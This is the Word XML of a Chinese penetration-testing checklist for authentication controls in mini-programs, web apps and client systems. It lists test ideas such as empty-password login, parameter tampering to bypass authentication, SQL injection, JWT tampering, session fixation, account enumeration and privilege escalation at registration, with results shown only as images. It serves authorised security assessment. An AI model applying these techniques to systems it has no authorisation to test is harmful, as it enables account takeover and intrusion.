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02664">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>验证测试工具书（安全计算环境）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED2736">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说明：本工具书可应用于微信小程序、Web应用渗透测试及C/S客户端系统的验证与安全测试工作。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpXSpec="center" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="543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9"/>
        <w:gridCol w:w="2838"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="5762"/>
        <w:gridCol w:w="1441"/>
        <w:gridCol w:w="1730"/>
      </w:tblGrid>
      <w:tr w14:paraId="4ADC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479" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="D3D3D3"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="374519EE">
            <w:pPr>
              <w:jc w:val="cente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安全控制点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="D3D3D3"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="710082AB">
            <w:pPr>
              <w:jc w:val="cente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控制项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="D3D3D3"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BA1D7B4">
            <w:pPr>
              <w:jc w:val="cente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对应漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="D3D3D3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6350601C">
            <w:pPr>
              <w:jc w:val="cente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检测手段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="D3D3D3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0347209F">
            <w:pPr>
              <w:jc w:val="cente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严重程度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="D3D3D3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24A85DDA">
            <w:pPr>
              <w:jc w:val="cente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测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>项核对表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7FF6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1479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1564C4DF">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身份鉴别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55E16020">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a）应对登录的用户进行身份标识和鉴别，身份标识具有唯一性，身份鉴别信息具有复杂度要求并定期更换；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42317F8B">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1.1任意用户登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43D43F74">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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弱身份验证逻辑检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DB04A7">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·固定用户名测试：尝试使用任意密码登录存在的用户名，查看系统响应。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65019116">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密码为空：很多系统忘记限制空密码或默认密码可登录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6721FCA7">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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2F512420">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="948055" cy="433705"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="444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5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="948055" cy="433705"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27A9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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0492E13B">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1D75972">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D8F290F">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60A2AB7E">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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逻辑绕过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79801005">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修改请求参数尝试绕过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4826D23B">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前端校验失效</w:t>
            </w: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有些系统只做了JS校验，在请求中去掉字段照样成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="145BFA9A">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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353CFA36">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="958215" cy="699135"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="5715"/>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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="958215" cy="699135"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CBADD82">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="711200"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="1270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7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="711200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="17EE14D6">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="467995"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
                  <wp:docPr id="1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1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="467995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="03BE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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FD8D3CC">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C420528">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5BCC81C5">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1650EED8">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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认证绕过漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058F683F">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SQL 注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F9B4788">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JWT Token篡改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13141037">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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2A30DF36">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="954405" cy="536575"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="15875"/>
                  <wp:docPr id="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1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="954405" cy="536575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60AF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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20F00ECF">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474ED2C">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4BB7FE3">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3A181DD4">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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会话固定攻击</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6310808A">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目标系统未在登录后重置session_id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2825E535">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攻击者可提前发送带session的链接，用户登录后该session被劫持</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50D6EF81">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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1B4BE0AC">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="959485" cy="709930"/>
                  <wp:effectExtent l="0" t="0" r="12065" b="139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959485" cy="709930"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCDA651">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="954405" cy="735965"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="698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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="954405" cy="735965"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13BAF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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29DC8643">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C178359">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D1699FC">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1.2账户枚举和可猜解用户账户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F7C8FCE">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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认证接口反馈差异</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671E62A3">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返回不同错误提示</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>（用户不存在或密码错误）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，可被爆破判断用户名是否存在。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0456876D">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60F2ED17">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5C113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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A326C0E">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B6840D5">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98C23DD">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027CF77">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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注册/找回密码功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="324ECA52">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·若提示：该邮箱未注册 → 存在枚举风险</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2048B220">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·注册功能中用户名检测接口可无限调用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FE62B20">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29D4149C">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47EF5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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35B55BD9">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9915134">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26E4E24D">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1BB1435A">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>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公开资产辅助枚举</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7191BC">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企业常用邮箱规则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35CA7678">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员工工号、邮箱前缀规律</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="332FB2E9">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29DD6AED">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2965F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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A140F81">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EA3B4E1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="695F26F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1.3任意用户注册</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A44EAEA">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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1.权限绕过创建高权限账号：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02664B5E">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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·通过修改注册请求参数（如角色ID、权限字段）尝试创建管理员账户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04FF9615">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79CC0132">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不存在注册功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D494FA">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="961390" cy="570230"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="1270"/>
                  <wp:docPr id="6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52"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="961390" cy="570230"/>
                          </a:xfrm>
